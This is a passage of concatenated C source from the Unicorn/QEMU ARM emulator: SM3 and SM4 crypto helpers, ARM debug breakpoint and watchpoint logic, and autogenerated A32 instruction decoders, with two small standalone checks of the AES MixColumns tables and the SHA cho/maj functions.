CR_ST_WORD(d, 2) = t ^ ror32(t, 17) ^ ror32(t, 9); t = CR_ST_WORD(d, 3) ^ CR_ST_WORD(n, 3) ^ ror32(CR_ST_WORD(d, 0), 17); CR_ST_WORD(d, 3) = t ^ ror32(t, 17) ^ ror32(t, 9); rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sm3partw2)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; uint32_t t = CR_ST_WORD(n, 0) ^ ror32(CR_ST_WORD(m, 0), 25); CR_ST_WORD(d, 0) ^= t; CR_ST_WORD(d, 1) ^= CR_ST_WORD(n, 1) ^ ror32(CR_ST_WORD(m, 1), 25); CR_ST_WORD(d, 2) ^= CR_ST_WORD(n, 2) ^ ror32(CR_ST_WORD(m, 2), 25); CR_ST_WORD(d, 3) ^= CR_ST_WORD(n, 3) ^ ror32(CR_ST_WORD(m, 3), 25) ^ ror32(t, 17) ^ ror32(t, 2) ^ ror32(t, 26); rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sm3tt)(void *vd, void *vn, void *vm, uint32_t imm2, uint32_t opcode) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; uint32_t t = 0; assert(imm2 < 4); if (opcode == 0 || opcode == 2) { /* SM3TT1A, SM3TT2A */ t = par(CR_ST_WORD(d, 3), CR_ST_WORD(d, 2), CR_ST_WORD(d, 1)); } else if (opcode == 1) { /* SM3TT1B */ t = maj(CR_ST_WORD(d, 3), CR_ST_WORD(d, 2), CR_ST_WORD(d, 1)); } else if (opcode == 3) { /* SM3TT2B */ t = cho(CR_ST_WORD(d, 3), CR_ST_WORD(d, 2), CR_ST_WORD(d, 1)); } else { g_assert_not_reached(); } t += CR_ST_WORD(d, 0) + 
CR_ST_WORD(m, imm2); CR_ST_WORD(d, 0) = CR_ST_WORD(d, 1); if (opcode < 2) { /* SM3TT1A, SM3TT1B */ t += CR_ST_WORD(n, 3) ^ ror32(CR_ST_WORD(d, 3), 20); CR_ST_WORD(d, 1) = ror32(CR_ST_WORD(d, 2), 23); } else { /* SM3TT2A, SM3TT2B */ t += CR_ST_WORD(n, 3); t ^= rol32(t, 9) ^ rol32(t, 17); CR_ST_WORD(d, 1) = ror32(CR_ST_WORD(d, 2), 13); } CR_ST_WORD(d, 2) = CR_ST_WORD(d, 3); CR_ST_WORD(d, 3) = t; rd[0] = d.l[0]; rd[1] = d.l[1]; } static uint8_t const sm4_sbox[] = { 0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05, 0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99, 0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62, 0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6, 0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8, 0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35, 0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87, 0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e, 0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1, 0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3, 0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f, 0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51, 0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8, 0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0, 0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84, 0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48, }; void HELPER(crypto_sm4e)(void *vd, void *vn) { uint64_t *rd = vd; uint64_t *rn = vn; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; uint32_t t, i; for (i = 0; i < 4; i++) { t = CR_ST_WORD(d, (i + 1) % 4) ^ CR_ST_WORD(d, (i + 2) % 4) ^ CR_ST_WORD(d, (i + 3) % 4) ^ CR_ST_WORD(n, i); t = sm4_sbox[t & 0xff] | sm4_sbox[(t >> 8) & 0xff] << 8 | sm4_sbox[(t >> 16) & 0xff] << 16 | sm4_sbox[(t >> 24) & 0xff] << 24; CR_ST_WORD(d, i) ^= t ^ rol32(t, 2) ^ rol32(t, 10) ^ rol32(t, 18) ^ rol32(t, 24); } rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sm4ekey)(void *vd, void *vn, void* vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; uint32_t t, i; d = n; for (i = 0; i < 4; i++) { t = CR_ST_WORD(d, (i + 1) % 4) ^ CR_ST_WORD(d, (i + 2) % 4) ^ CR_ST_WORD(d, (i + 3) % 4) ^ CR_ST_WORD(m, i); t = sm4_sbox[t & 0xff] | sm4_sbox[(t >> 8) & 0xff] << 8 | sm4_sbox[(t >> 16) & 0xff] << 16 | sm4_sbox[(t >> 24) & 0xff] << 24; CR_ST_WORD(d, i) ^= t ^ rol32(t, 13) ^ rol32(t, 23); } rd[0] = d.l[0]; rd[1] = d.l[1]; } 
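The two MixColumns tables above let the helper compute (Inv)MixColumns one byte at a time: each 32-bit entry is the column contributed by a single input byte, and the loop above combines four lookups from mc[decrypt] as T[b0] ^ rol32(T[b1], 8) ^ rol32(T[b2], 16) ^ rol32(T[b3], 24). A minimal standalone sketch, not part of this file (xtime and gmul are illustrative helpers of ours), that rebuilds the inverse table's packing from GF(2^8) arithmetic and spot-checks it against the entries listed above:

#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Multiply by x in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1. */
static uint8_t xtime(uint8_t a)
{
    return (uint8_t)((a << 1) ^ ((a & 0x80) ? 0x1b : 0x00));
}

/* Generic GF(2^8) multiply by shift-and-add. */
static uint8_t gmul(uint8_t a, uint8_t b)
{
    uint8_t r = 0;
    while (b) {
        if (b & 1) {
            r ^= a;
        }
        a = xtime(a);
        b >>= 1;
    }
    return r;
}

int main(void)
{
    /*
     * Each inverse-table word packs the InvMixColumns column
     * {0e, 09, 0d, 0b} * x, low byte first; spot-check the entries
     * listed above for x = 1 (0x0b0d090e) and x = 2 (0x161a121c).
     */
    for (unsigned x = 0; x < 256; x++) {
        uint32_t w = (uint32_t)gmul((uint8_t)x, 0x0e) |
                     (uint32_t)gmul((uint8_t)x, 0x09) << 8 |
                     (uint32_t)gmul((uint8_t)x, 0x0d) << 16 |
                     (uint32_t)gmul((uint8_t)x, 0x0b) << 24;
        if (x == 1) {
            assert(w == 0x0b0d090e);
        }
        if (x == 2) {
            assert(w == 0x161a121c);
        }
    }
    puts("inverse MixColumns packing verified");
    return 0;
}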
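The cho and maj helpers above are shared between the SHA-1, SHA-256 and SM3 rounds, but they use algebraically rearranged forms rather than the textbook definitions. A self-contained check, ours rather than part of the tree, that the rearranged forms agree with FIPS 180-4's Ch(x,y,z) = (x AND y) XOR (NOT x AND z) and Maj(x,y,z) = (x AND y) XOR (x AND z) XOR (y AND z):

#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* The forms used by the helpers above. */
static uint32_t cho(uint32_t x, uint32_t y, uint32_t z)
{
    return (x & (y ^ z)) ^ z;
}

static uint32_t maj(uint32_t x, uint32_t y, uint32_t z)
{
    return (x & y) | ((x | y) & z);
}

int main(void)
{
    /* Compare against the textbook Ch/Maj on a spread of values
       (the constants are the SHA-1 round constants). */
    static const uint32_t v[] = {
        0x00000000u, 0xffffffffu, 0x5a827999u,
        0x6ed9eba1u, 0x8f1bbcdcu, 0xca62c1d6u,
    };
    for (int i = 0; i < 6; i++) {
        for (int j = 0; j < 6; j++) {
            for (int k = 0; k < 6; k++) {
                uint32_t x = v[i], y = v[j], z = v[k];
                assert(cho(x, y, z) == ((x & y) ^ (~x & z)));
                assert(maj(x, y, z) == ((x & y) ^ (x & z) ^ (y & z)));
            }
        }
    }
    puts("cho/maj agree with the FIPS 180-4 Ch/Maj definitions");
    return 0;
}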
unicorn-2.1.1/qemu/target/arm/debug_helper.c
/* * ARM debug helpers. * * This code is licensed under the GNU GPL v2 or later. * * SPDX-License-Identifier: GPL-2.0-or-later */ #include "qemu/osdep.h" #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "exec/helper-proto.h"
/* Return true if the linked breakpoint entry lbn passes its checks */ static bool linked_bp_matches(ARMCPU *cpu, int lbn) { CPUARMState *env = &cpu->env; uint64_t bcr = env->cp15.dbgbcr[lbn]; int brps = arm_num_brps(cpu); int ctx_cmps = arm_num_ctx_cmps(cpu); int bt; uint32_t contextidr; uint64_t hcr_el2; /* * Links to unimplemented or non-context aware breakpoints are * CONSTRAINED UNPREDICTABLE: either behave as if disabled, or * as if linked to an UNKNOWN context-aware breakpoint (in which * case DBGWCR<n>_EL1.LBN must indicate that breakpoint). * We choose the former. */ if (lbn >= brps || lbn < (brps - ctx_cmps)) { return false; } bcr = env->cp15.dbgbcr[lbn]; if (extract64(bcr, 0, 1) == 0) { /* Linked breakpoint disabled : generate no events */ return false; } bt = extract64(bcr, 20, 4); hcr_el2 = arm_hcr_el2_eff(env); switch (bt) { case 3: /* linked context ID match */ switch (arm_current_el(env)) { default: /* Context matches never fire in AArch64 EL3 */ return false; case 2: if (!(hcr_el2 & HCR_E2H)) { /* Context matches never fire in EL2 without E2H enabled. */ return false; } contextidr = env->cp15.contextidr_el[2]; break; case 1: contextidr = env->cp15.contextidr_el[1]; break; case 0: if ((hcr_el2 & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { contextidr = env->cp15.contextidr_el[2]; } else { contextidr = env->cp15.contextidr_el[1]; } break; } break; case 7: /* linked contextidr_el1 match */ contextidr = env->cp15.contextidr_el[1]; break; case 13: /* linked contextidr_el2 match */ contextidr = env->cp15.contextidr_el[2]; break; case 9: /* linked VMID match (reserved if no EL2) */ case 11: /* linked context ID and VMID match (reserved if no EL2) */ case 15: /* linked full context ID match */ default: /* * Links to Unlinked context breakpoints must generate no * events; we choose to do the same for reserved values too. */ return false; } /* * We match the whole register even if this is AArch32 using the * short descriptor format (in which case it holds both PROCID and ASID), * since we don't implement the optional v7 context ID masking. */ return contextidr == (uint32_t)env->cp15.dbgbvr[lbn]; }
static bool bp_wp_matches(ARMCPU *cpu, int n, bool is_wp) { CPUARMState *env = &cpu->env; uint64_t cr; int pac, hmc, ssc, wt, lbn; /* * Note that for watchpoints the check is against the CPU security * state, not the S/NS attribute on the offending data access.
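 * (Hence the SSC checks below test arm_is_secure(env) rather than the
 * memory attributes of the access itself.)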
*/ bool is_secure = arm_is_secure(env); int access_el = arm_current_el(env); if (is_wp) { CPUWatchpoint *wp = env->cpu_watchpoint[n]; if (!wp || !(wp->flags & BP_WATCHPOINT_HIT)) { return false; } cr = env->cp15.dbgwcr[n]; if (wp->hitattrs.user) { /* * The LDRT/STRT/LDT/STT "unprivileged access" instructions should * match watchpoints as if they were accesses done at EL0, even if * the CPU is at EL1 or higher. */ access_el = 0; } } else { uint64_t pc = is_a64(env) ? env->pc : env->regs[15]; if (!env->cpu_breakpoint[n] || env->cpu_breakpoint[n]->pc != pc) { return false; } cr = env->cp15.dbgbcr[n]; } /* * The WATCHPOINT_HIT flag guarantees us that the watchpoint is * enabled and that the address and access type match; for breakpoints * we know the address matched; check the remaining fields, including * linked breakpoints. We rely on WCR and BCR having the same layout * for the LBN, SSC, HMC, PAC/PMC and is-linked fields. * Note that some combinations of {PAC, HMC, SSC} are reserved and * must act either like some valid combination or as if the watchpoint * were disabled. We choose the former, and use this together with * the fact that EL3 must always be Secure and EL2 must always be * Non-Secure to simplify the code slightly compared to the full * table in the ARM ARM. */ pac = extract64(cr, 1, 2); hmc = extract64(cr, 13, 1); ssc = extract64(cr, 14, 2); switch (ssc) { case 0: break; case 1: case 3: if (is_secure) { return false; } break; case 2: if (!is_secure) { return false; } break; } switch (access_el) { case 3: case 2: if (!hmc) { return false; } break; case 1: if (extract32(pac, 0, 1) == 0) { return false; } break; case 0: if (extract32(pac, 1, 1) == 0) { return false; } break; default: g_assert_not_reached(); } wt = extract64(cr, 20, 1); lbn = extract64(cr, 16, 4); if (wt && !linked_bp_matches(cpu, lbn)) { return false; } return true; } static bool check_watchpoints(ARMCPU *cpu) { CPUARMState *env = &cpu->env; int n; /* * If watchpoints are disabled globally or we can't take debug * exceptions here then watchpoint firings are ignored. */ if (extract32(env->cp15.mdscr_el1, 15, 1) == 0 || !arm_generate_debug_exceptions(env)) { return false; } for (n = 0; n < ARRAY_SIZE(env->cpu_watchpoint); n++) { if (bp_wp_matches(cpu, n, true)) { return true; } } return false; } static bool check_breakpoints(ARMCPU *cpu) { CPUARMState *env = &cpu->env; int n; /* * If breakpoints are disabled globally or we can't take debug * exceptions here then breakpoint firings are ignored. */ if (extract32(env->cp15.mdscr_el1, 15, 1) == 0 || !arm_generate_debug_exceptions(env)) { return false; } for (n = 0; n < ARRAY_SIZE(env->cpu_breakpoint); n++) { if (bp_wp_matches(cpu, n, false)) { return true; } } return false; } void HELPER(check_breakpoints)(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); if (check_breakpoints(cpu)) { HELPER(exception_internal(env, EXCP_DEBUG)); } } bool arm_debug_check_watchpoint(CPUState *cs, CPUWatchpoint *wp) { /* * Called by core code when a CPU watchpoint fires; need to check if this * is also an architectural watchpoint match. */ ARMCPU *cpu = ARM_CPU(cs); return check_watchpoints(cpu); } void arm_debug_excp_handler(CPUState *cs) { /* * Called by core code when a watchpoint or breakpoint fires; * need to check which one and raise the appropriate exception. 
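 * A watchpoint hit is reported as a data abort carrying a watchpoint
 * syndrome, a breakpoint hit as a prefetch abort carrying a breakpoint
 * syndrome; both are routed to arm_debug_target_el(env).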
*/ ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; CPUWatchpoint *wp_hit = cs->watchpoint_hit; if (wp_hit) { if (wp_hit->flags & BP_CPU) { bool wnr = (wp_hit->flags & BP_WATCHPOINT_HIT_WRITE) != 0; bool same_el = arm_debug_target_el(env) == arm_current_el(env); cs->watchpoint_hit = NULL; env->exception.fsr = arm_debug_exception_fsr(env); env->exception.vaddress = wp_hit->hitaddr; raise_exception(env, EXCP_DATA_ABORT, syn_watchpoint(same_el, 0, wnr), arm_debug_target_el(env)); } } else { uint64_t pc = is_a64(env) ? env->pc : env->regs[15]; bool same_el = (arm_debug_target_el(env) == arm_current_el(env)); /* * (1) GDB breakpoints should be handled first. * (2) Do not raise a CPU exception if no CPU breakpoint has fired, * since singlestep is also done by generating a debug internal * exception. */ if (cpu_breakpoint_test(cs, pc, BP_GDB) || !cpu_breakpoint_test(cs, pc, BP_CPU)) { return; } env->exception.fsr = arm_debug_exception_fsr(env); /* * FAR is UNKNOWN: clear vaddress to avoid potentially exposing * values to the guest that it shouldn't be able to see at its * exception/security level. */ env->exception.vaddress = 0; raise_exception(env, EXCP_PREFETCH_ABORT, syn_breakpoint(same_el), arm_debug_target_el(env)); } }
vaddr arm_adjust_watchpoint_address(CPUState *cs, vaddr addr, int len) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; /* * In BE32 system mode, target memory is stored byteswapped (on a * little-endian host system), and by the time we reach here (via an * opcode helper) the addresses of subword accesses have been adjusted * to account for that, which means that watchpoints will not match. * Undo the adjustment here. */ if (arm_sctlr_b(env)) { if (len == 1) { addr ^= 3; } else if (len == 2) { addr ^= 2; } } return addr; }
unicorn-2.1.1/qemu/target/arm/decode-a32-uncond.inc.c
/* This file is autogenerated by scripts/decodetree.py.
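 * The generated shape is fixed: one arg_* struct per instruction format,
 * one trans_* predicate per pattern (implemented by the translator that
 * #includes this file), one extract helper per format that unpacks fields
 * with extract32()/sextract32(), and a nest of switches over fixed opcode
 * bits that dispatches each matched pattern to its trans_* call.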
*/ typedef struct { int A; int F; int I; int M; int imod; int mode; } arg_cps; typedef struct { int pu; int rn; int w; } arg_rfe; typedef struct { int E; } arg_setend; typedef struct { int mode; int pu; int w; } arg_srs; #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_i arg_BLX_i; static bool trans_BLX_i(DisasContext *ctx, arg_BLX_i *a); typedef arg_rfe arg_RFE; static bool trans_RFE(DisasContext *ctx, arg_RFE *a); typedef arg_srs arg_SRS; static bool trans_SRS(DisasContext *ctx, arg_SRS *a); typedef arg_cps arg_CPS; static bool trans_CPS(DisasContext *ctx, arg_CPS *a); typedef arg_empty arg_CLREX; static bool trans_CLREX(DisasContext *ctx, arg_CLREX *a); typedef arg_empty arg_DSB; static bool trans_DSB(DisasContext *ctx, arg_DSB *a); typedef arg_empty arg_DMB; static bool trans_DMB(DisasContext *ctx, arg_DMB *a); typedef arg_empty arg_ISB; static bool trans_ISB(DisasContext *ctx, arg_ISB *a); typedef arg_empty arg_SB; static bool trans_SB(DisasContext *ctx, arg_SB *a); typedef arg_setend arg_SETEND; static bool trans_SETEND(DisasContext *ctx, arg_SETEND *a); typedef arg_empty arg_PLD; static bool trans_PLD(DisasContext *ctx, arg_PLD *a); typedef arg_empty arg_PLDW; static bool trans_PLDW(DisasContext *ctx, arg_PLDW *a); typedef arg_empty arg_PLI; static bool trans_PLI(DisasContext *ctx, arg_PLI *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_0(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = times_2(ctx, deposit32(extract32(insn, 24, 1), 1, 31, sextract32(insn, 0, 24))); } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_1(DisasContext *ctx, arg_rfe *a, uint32_t insn) { a->pu = extract32(insn, 23, 2); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_2(DisasContext *ctx, arg_srs *a, uint32_t insn) { a->pu = extract32(insn, 23, 2); a->w = extract32(insn, 21, 1); a->mode = extract32(insn, 0, 5); } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_3(DisasContext *ctx, arg_cps *a, uint32_t insn) { a->imod = extract32(insn, 18, 2); a->M = extract32(insn, 17, 1); a->A = extract32(insn, 8, 1); a->I = extract32(insn, 7, 1); a->F = extract32(insn, 6, 1); a->mode = extract32(insn, 0, 5); } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_4(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void disas_a32_uncond_extract_disas_a32_uncond_Fmt_5(DisasContext *ctx, arg_setend *a, uint32_t insn) { a->E = extract32(insn, 9, 1); } static bool disas_a32_uncond(DisasContext *ctx, uint32_t insn) { union { arg_cps f_cps; arg_empty f_empty; arg_i f_i; arg_rfe f_rfe; arg_setend f_setend; arg_srs f_srs; } u; switch ((insn >> 25) & 0x7f) { case 0x78: /* 1111000. ........ ........ ........ */ switch (insn & 0x01f1fc20) { case 0x01000000: /* 11110001 0000...0 000000.. ..0..... */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_3(ctx, &u.f_cps, insn); switch ((insn >> 9) & 0x1) { case 0x0: /* 11110001 0000...0 0000000. ..0..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:43 */ if (trans_CPS(ctx, &u.f_cps)) return true; return false; } return false; case 0x01010000: /* 11110001 0000...1 000000.. ..0..... 
*/ disas_a32_uncond_extract_disas_a32_uncond_Fmt_5(ctx, &u.f_setend, insn); switch (insn & 0x000e01df) { case 0x00000000: /* 11110001 00000001 000000.0 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:56 */ if (trans_SETEND(ctx, &u.f_setend)) return true; return false; } return false; } return false; case 0x7a: /* 1111010. ........ ........ ........ */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_4(ctx, &u.f_empty, insn); switch (insn & 0x01700000) { case 0x00100000: /* 11110100 .001.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:73 */ if (trans_PLDW(ctx, &u.f_empty)) return true; return false; case 0x00500000: /* 11110100 .101.... ........ ........ */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110100 .101.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:62 */ if (trans_PLI(ctx, &u.f_empty)) return true; return false; } return false; case 0x01100000: /* 11110101 .001.... ........ ........ */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110101 .001.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:61 */ if (trans_PLDW(ctx, &u.f_empty)) return true; return false; } return false; case 0x01500000: /* 11110101 .101.... ........ ........ */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110101 .101.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:60 */ if (trans_PLD(ctx, &u.f_empty)) return true; return false; } return false; case 0x01700000: /* 11110101 .111.... ........ ........ */ switch (insn & 0x008ffff0) { case 0x000ff010: /* 11110101 01111111 11110000 0001.... */ switch (insn & 0x0000000f) { case 0x0000000f: /* 11110101 01111111 11110000 00011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:49 */ if (trans_CLREX(ctx, &u.f_empty)) return true; return false; } return false; case 0x000ff040: /* 11110101 01111111 11110000 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:50 */ if (trans_DSB(ctx, &u.f_empty)) return true; return false; case 0x000ff050: /* 11110101 01111111 11110000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:51 */ if (trans_DMB(ctx, &u.f_empty)) return true; return false; case 0x000ff060: /* 11110101 01111111 11110000 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:52 */ if (trans_ISB(ctx, &u.f_empty)) return true; return false; case 0x000ff070: /* 11110101 01111111 11110000 0111.... */ switch (insn & 0x0000000f) { case 0x00000000: /* 11110101 01111111 11110000 01110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:53 */ if (trans_SB(ctx, &u.f_empty)) return true; return false; } return false; } return false; } return false; case 0x7b: /* 1111011. ........ ........ ........ */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_4(ctx, &u.f_empty, insn); switch (insn & 0x01700010) { case 0x00100000: /* 11110110 .001.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:74 */ if (trans_PLDW(ctx, &u.f_empty)) return true; return false; case 0x00500000: /* 11110110 .101.... ........ ...0.... 
*/ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110110 .101.... 1111.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:66 */ if (trans_PLI(ctx, &u.f_empty)) return true; return false; } return false; case 0x01100000: /* 11110111 .001.... ........ ...0.... */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110111 .001.... 1111.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:65 */ if (trans_PLDW(ctx, &u.f_empty)) return true; return false; } return false; case 0x01500000: /* 11110111 .101.... ........ ...0.... */ switch ((insn >> 12) & 0xf) { case 0xf: /* 11110111 .101.... 1111.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:64 */ if (trans_PLD(ctx, &u.f_empty)) return true; return false; } return false; } return false; case 0x7c: /* 1111100. ........ ........ ........ */ switch (insn & 0x0050ffe0) { case 0x00100a00: /* 1111100. .0.1.... 00001010 000..... */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_1(ctx, &u.f_rfe, insn); switch (insn & 0x0000001f) { case 0x00000000: /* 1111100. .0.1.... 00001010 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:41 */ if (trans_RFE(ctx, &u.f_rfe)) return true; return false; } return false; case 0x00400500: /* 1111100. .1.0.... 00000101 000..... */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_2(ctx, &u.f_srs, insn); switch ((insn >> 16) & 0xf) { case 0xd: /* 1111100. .1.01101 00000101 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:42 */ if (trans_SRS(ctx, &u.f_srs)) return true; return false; } return false; } return false; case 0x7d: /* 1111101. ........ ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32-uncond.decode:33 */ disas_a32_uncond_extract_disas_a32_uncond_Fmt_0(ctx, &u.f_i, insn); if (trans_BLX_i(ctx, &u.f_i)) return true; return false; } return false; }
unicorn-2.1.1/qemu/target/arm/decode-a32.inc.c
/* This file is autogenerated by scripts/decodetree.py.
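 * As in decode-a32-uncond.inc.c, the trans_* predicates are supplied by
 * the including translator. Split immediates are stitched together with
 * deposit32() and scaled after extraction by helpers such as times_2()
 * and times_4() (see disas_a32_extract_branch and disas_a32_extract_mov16
 * below).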
*/ typedef struct { int lsb; int msb; int rd; int rn; } arg_bfi; typedef struct { int lsb; int rd; int rn; int widthm1; } arg_bfx; typedef struct { int rn; int rt; int rt2; } arg_disas_a3226; typedef struct { #ifdef _MSC_VER int dummy; #endif } arg_empty; typedef struct { int imm; } arg_i; typedef struct { int imm; int rn; int rt; int rt2; } arg_ldrex; typedef struct { int b; int i; int list; int rn; int u; int w; } arg_ldst_block; typedef struct { int imm; int p; int rn; int rt; int u; int w; } arg_ldst_ri; typedef struct { int p; int rm; int rn; int rt; int shimm; int shtype; int u; int w; } arg_ldst_rr; typedef struct { int r; int rd; int sysm; } arg_mrs_bank; typedef struct { int r; int rd; } arg_mrs_reg; typedef struct { int r; int rn; int sysm; } arg_msr_bank; typedef struct { int imm; int mask; int r; int rot; } arg_msr_i; typedef struct { int mask; int r; int rn; } arg_msr_reg; typedef struct { int imm; int rd; int rm; int rn; int tb; } arg_pkh; typedef struct { int rm; } arg_r; typedef struct { int imm; int rd; } arg_ri; typedef struct { int rd; int rm; } arg_rr; typedef struct { int rd; int rm; int rn; } arg_rrr; typedef struct { int rd; int rm; int rn; int rot; } arg_rrr_rot; typedef struct { int ra; int rd; int rm; int rn; } arg_rrrr; typedef struct { int imm; int rd; int rn; int rot; int s; } arg_s_rri_rot; typedef struct { int rd; int rm; int rn; int s; int shim; int shty; } arg_s_rrr_shi; typedef struct { int rd; int rm; int rn; int rs; int s; int shty; } arg_s_rrr_shr; typedef struct { int ra; 